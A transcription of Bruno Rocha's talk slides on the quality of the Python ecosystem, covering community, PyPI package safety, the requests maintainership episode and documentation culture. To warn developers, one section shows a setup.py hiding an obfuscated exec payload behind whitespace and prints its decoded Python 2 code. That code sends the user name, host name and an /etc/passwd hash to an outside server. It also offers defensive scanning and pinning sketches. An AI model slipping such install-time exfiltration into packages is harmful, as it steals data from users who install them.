The Quality of the Python Ecosystem - and how we can protect it!

The Quality of the Python Ecosystem
Bruno Rocha - @rochaCbruno - brunorocha.org


Post on 29-Jan-2018



Bruno Rocha - @rochaCbruno

Quality Engineer @ RedHat.com

Podcaster @ Castalio.info

Teacher @ CursoDePython.com.br

Blogger @ BrunoRocha.org

castalio.info

youtube.com/castaliopodcast

Every Monday at 10 AM: podcast available on iTunes, RSS, podcast players, etc.

Every Wednesday at 7 PM: live on YouTube!

“An ecosystem is a community of living organisms in conjunction with the nonliving components of their environment (things like air, water and mineral soil), interacting as a system”

-- Wikipedia

- You (and your groups)

- Communities (meetups and conferences)

- Theoretical material (books, tutorials, courses)

- Tools (systems, IDEs, platforms)

- Package library (pip, github, conda)

- Python Software Foundation

- The Language (core developers)

The Python ecosystem?

What attracts so many people to Python?

- Python is easy to learn.
- The community is receptive.
- It has really cool events.
- It's easy to write and publish new libraries with Python.
- You think of something... and it is already on PyPI.
- It is popular and fashionable.
- It is approved by large companies.

$ pip install magic
>>> magic.run()

Or in the words of the Brazilian poet...

“In Python everything is an object, it is also beautiful and wonderful.” (it makes more sense in Portuguese)

How to assure Software Quality?

Enterprise

?

How to assure professional quality?

?

Professional Python Certification! Become a professional for only $9,999.99 / year

How to assure the Quality of published libraries?

?

Become a “Python Developer Partner”! Publish your libraries to the “PyPI store” for only $9,999.99 / year

PY

New Python 3.6
Featuring exclusive `f'string'`

Only $ 999/year

You need Python 3.6
Call 555-5555 and buy it now!

Opportunity: the first 100 customers will get IDLE for free...
By Guido Inc.

Dude, how can you be so dumb?

● Python has no owner, it belongs to the community.
● The community is quality control.
● The community is a certifying entity *.

* In the Python community, EVERYONE is encouraged to participate and make a difference. Collaborating with the various pillars of the community (slide 4) is of great value to the career of a Python professional.

YOU

“I came for the language but I stay for the community” - Brett Cannon

"Diversity happens when different people meet in one place"

"Inclusion happens when these people can work together, as equals, with the same opportunities and without prejudice to any of them"

- Naomi Ceder (Pycon Brasil 2016)

How do we fight community and diversity problems?

- Code of conduct
- Adopt a mentor's position, not a judge's.

Open by default

- PSF (grants, membership, fellowship and board)
- Repositories
- Experiments (MyPy, Gilectomy)
- APyB
- Call 4 Papers
- PyPI/Warehouse
- Python Planet
- PEPs
- GruPys

You can participate openly!!!

100_000+ libraries on PyPI

$ pip install magic
>>> magic.run()

- Python is easy!
- Lots of libraries available

>>> Traceback
Cannot do the magic today...

- How many of the 100_000+ have test coverage?

- Good documentation?

- How do I choose?

$ pip install magic
$ installing…
$ HAHA you got hacked!!!

- Are all those libs safe?

- Anyone can publish a new lib on PyPI in a few minutes. Who assures its safety?

Safety!!!

# setup.py `pip install magic`
from setuptools import setup

setup(
    name="magic",
    ...
)

Always review the source code of the libs you are installing.

Especially `setup.py`

Don’t forget the scrollbars.

;import zlib;

exec(zlib.decompress('eJx9UcFqxCAQvfsVXhYVtoY

Wegn0uF+x7MHG2ShNHNEJ3aX036vJBrJQ4uX5HOfNe+rH

iIk4ZuaX\n3ZSGwX8+s7eVOpPdphoHQ1dMI2OU7i3jZU3

BjMA/iqDugQbsfZCKwa2DSPw0g8fATebw3CDOh3wR\n/M

Bho+YwU6mtc/R8Warz62VP8tH1r+K1RijFRxI92neJEYI

UDVDXRJPztxVKJzBWKqUd3KzvIdN+\nilV2O9MaMuVoeU

JdAEKHFuSPmGOIdsl+5KIaLrRCYbNWoTP+qu3jLr9RtRb

Pjii2TRPv5DC8BFNd\nFcsJvyYTo+5wbMSRVyO77mtq9g

fllKgC\n'.decode('base64')))

Multiple of 4 white spaces

Python tricks!

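# `pip install magic`
# Python 2 code, shown for review only.
import os, urllib, urllib2, hashlib, platform

# Collect the login name of the current user.
try:
    uname = os.getlogin()
except Exception as e:
    uname = '[%s]' % e

# Collect the host name of the machine.
try:
    host = platform.uname()[1]
except Exception as e:
    host = '[%s]' % e

# Fingerprint the machine with an MD5 hash of /etc/passwd.
try:
    fhash = hashlib.md5(open('/etc/passwd').read()).hexdigest()
except Exception as e:
    fhash = '[%s]' % e

data = urllib.urlencode({'uname': uname, 'host': host, 'fhash': fhash})

# Send the collected data to a remote server, silently ignoring any failure.
try:
    urllib2.urlopen('http://WannaPyCry.herokuapp.com/', data)
except Exception as e:
    pass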

Decoded trick

Nothing serious here.
But it could be a real hack.
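The advice to review `setup.py` and to not forget the scrollbars can be partly automated. What follows is only a minimal sketch, not a real security scanner: the function name `find_suspicious_lines`, the regular expressions, and the thresholds (40 spaces, 200 characters) are all assumptions made for illustration. It flags lines that call `exec`, `eval`, or `__import__`, lines where code sits to the right of a long run of whitespace, and unusually long lines.

```python
import re

# Hypothetical heuristics, chosen only for illustration.
SUSPICIOUS_CALLS = re.compile(r"\b(exec|eval|__import__)\s*\(")
HIDDEN_AFTER_GAP = re.compile(r"\S[ \t]{40,}\S")  # code pushed far to the right
MAX_LINE_LENGTH = 200


def find_suspicious_lines(source):
    """Return (line_number, reason) pairs for lines that deserve a manual look."""
    findings = []
    for number, line in enumerate(source.splitlines(), start=1):
        if SUSPICIOUS_CALLS.search(line):
            findings.append((number, "dynamic code execution"))
        if HIDDEN_AFTER_GAP.search(line):
            findings.append((number, "code hidden after a long run of spaces"))
        if len(line) > MAX_LINE_LENGTH:
            findings.append((number, "unusually long line"))
    return findings


# A harmless sample that imitates the trick: the second line looks normal
# until you scroll 80 columns to the right.
sample = (
    "from setuptools import setup\n"
    "setup(name='magic')" + " " * 80 + ";import zlib;exec(zlib.decompress(b''))\n"
)
findings = find_suspicious_lines(sample)
for number, reason in findings:
    print(number, reason)
```

A clean result from a check like this proves nothing; it only points a human reviewer at the lines to read first.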

Solution?

$ pip install safety
$ safety check

Open source, community-driven safety checks?

Please create more safety tools!!!!

Why doesn't “The Python” fix these issues without depending on third-party services?

https://github.com/pypa
The new generation of PyPI is `warehouse`, and you can help on github.com/pypa
Only 18 contributors?

Not a coder? Donate!!!

Warehouse is a next generation Python Package Repository designed to replace the legacy code base that currently powers PyPI

Rank: 4.5 - safe

Rank: 2.0 - outdated

Rank: 1.0 - danger

1,234 Reviews ++1 Review --

Why not make it more `social driven` to address the library quality problem?

Example: more maintainers, more quality points!

What to do about safety?

- Check before installing
- Install known and trusted libraries
- Use SafetyCI - pyup.io
- Create (and share) more tools to help with verification
- Report any lib you find suspicious
- Contribute to the PyPA / Warehouse project

The responsibility is not YOURS, it is OURS!!!

Every library published in PyPI comes with an invisible tag that says:

"I am aware of the responsibilities that I must assume when I publish this code, and I promise to do my best to keep its quality until the end of time! And I will state explicitly if for any reason I cannot keep doing so, leaving the path clear for anyone wanting to create a fork!"

That “one man project” is not so cool

Maintainable:

A project that can be maintained by as many and as diverse people as possible.

Left-pad is an `npm` problem; will it not happen with Python?

pip install requests
● 99.9% of installations of Python environments install requests
● If the version is not specified, your build may break
● Tools like Travis CI depend on requests and have already broken because of this!
● Operating systems ship requests by default
● Until a few months ago this was a 'one man band' project, but after recent issues with releases the creator decided to remove himself as administrator of the lib and appointed other maintainers
● It is not the only one; there are other Python libs published with the same risk

● Always specify your versions
● Use pyup.io or requires.io or any other solution of the type
● Use safety / CI or something similar
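"Always specify your versions" is easy to check mechanically. The sketch below is a simplified illustration, not a full requirements parser: the function name `find_unpinned` and the regular expression are assumptions, and it treats only an exact `name==version` line (optionally with extras or an environment marker) as pinned. It skips option lines such as `-r` and `-e` and does not handle URLs or hashes.

```python
import re

# Simplified pattern for an exactly pinned requirement, e.g. "requests==2.18.4"
# or "requests[security]==2.18.4". Wildcards such as "1.11.*" do not count.
PINNED = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._-]*(\[[^\]]*\])?\s*==\s*[^\s*;,]+\s*(;.*)?$"
)


def find_unpinned(requirements_text):
    """Return the requirement lines that are not pinned to an exact version."""
    unpinned = []
    for raw in requirements_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line or line.startswith("-"):  # skip blanks and options (-r, -e)
            continue
        if not PINNED.match(line):
            unpinned.append(line)
    return unpinned


example = """\
requests
flask==0.12.2
safety>=1.0  # any recent version
django==1.11.*
-r base.txt
"""
unpinned = find_unpinned(example)
print(unpinned)
```

Running a check like this in CI makes an unpinned dependency fail the build before a broken upstream release does.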

…..

Too many broken releases in a single day...

Travis CI broke (even if you pinned the version) because it depended on requests itself.
And backwards-incompatible code was pushed.

So the creator took responsibility and did the right thing! Thanks!!!

Safety and maintainability are not the only problems!

Just as we recently changed our testing culture, we need efforts to change our documentation culture!

Q: Why do most libraries not have good documentation?
A: Writing documentation is a boring process!

Q: Why is it boring?
A: Unfriendly tools and formats (rst) drive people away from documentation. We need to do as we did with tests and adopt easier formats (md?) and tools. In other words, we need a `py.test` for documentation.

Q: How to encourage people to contribute documentation?
A: First we need to define the process (as we did for tests) and then create a manifesto that attracts contributors, shows the importance of documentation, gives documenters a certain status, and uses events to foster that culture.

Tips to write good libs

python.apichecklist.com

Conclusion
- Python is not a product!
- The ecosystem (mainly the community) already has above-average quality
- We need more quality theoretical material for beginners
- Documentation is important; we need to give it more focus
- We can use tools to help in the QA of Python libraries
- We can collaborate with the evolution of PyPI
- We can collaborate with the evolution of Python
- The quality of the ecosystem is OUR responsibility
- Be responsible and publish only quality libraries in PyPI
- We need a collaborative solution to classify 100,000+ libs
- Collaborate!
